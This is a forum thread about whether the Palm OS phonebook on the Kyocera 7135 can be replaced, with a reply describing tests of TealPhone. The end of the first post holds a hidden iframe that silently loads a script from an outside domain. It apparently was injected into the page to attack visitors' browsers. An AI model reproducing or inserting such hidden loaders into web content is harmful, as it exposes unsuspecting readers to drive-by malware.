+ Reply to Thread

Palm Capabilities - Phonebook

Being at a severe disadvantage (not having a 7135) I was curious to find out how integrated the Palm capabilities were with the phone side of the unit. So I asked Ky if the phonebook could be upgraded (I like Tealphone):

"We understand that you would like to know if the Palm OS address Book on the Kyocera 7135 could be upgraded. Unfortunately, this is not possible.

"There may, however, be a 3rd party application that you can instead of the included address book. Compatibility of a 3rd party application with the Voice Dial, Speed Dial, and Caller ID functions of the phone is not likely, but one would need to contact the technical support department of the 3rd party application to verify this statement as 3rd party applications are not supported by Kyocera."

Given the niche market of Palm phonebook upgrades, and the even smaller niche of 7135 users, it seems that the union of the two wouldn't be large enough to coax a developer to spend time on it. Since it's reasonalby clear that the OS isn't ugradable, unless Ky and the provider spring for it, we're going to be stuck on OS 4.1, even though Palm is pushing 5 and beyond as its wireless platform.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Palm Capabilities - Phonebook

Originally posted by Bobh
    Being at a severe disadvantage (not having a 7135) I was curious to find out how integrated the Palm capabilities were with the phone side of the unit. So I asked Ky if the phonebook could be upgraded (I like Tealphone):

"We understand that you would like to know if the Palm OS address Book on the Kyocera 7135 could be upgraded. Unfortunately, this is not possible.

"There may, however, be a 3rd party application that you can instead of the included address book. Compatibility of a 3rd party application with the Voice Dial, Speed Dial, and Caller ID functions of the phone is not likely, but one would need to contact the technical support department of the 3rd party application to verify this statement as 3rd party applications are not supported by Kyocera."

Given the niche market of Palm phonebook upgrades, and the even smaller niche of 7135 users, it seems that the union of the two wouldn't be large enough to coax a developer to spend time on it. Since it's reasonalby clear that the OS isn't ugradable, unless Ky and the provider spring for it, we're going to be stuck on OS 4.1, even though Palm is pushing 5 and beyond as its wireless platform.
    I just downloaded TealPhone to check it out. You can dial from TealPhone on the 7135 by selecting the Smartphone setting. However, the integration is "one-way". There are a number of places in the phone applications where you can bring up the address book, and it always opens the default Palm address book, and that is apparently not changeable. Since both use the same database, I don't really see that as a problem, but it would be nice if you could set a "default address book program" in the phone prefs, similar to how you can remap a button.

Alan

Thanks for going to the trouble of checking it out.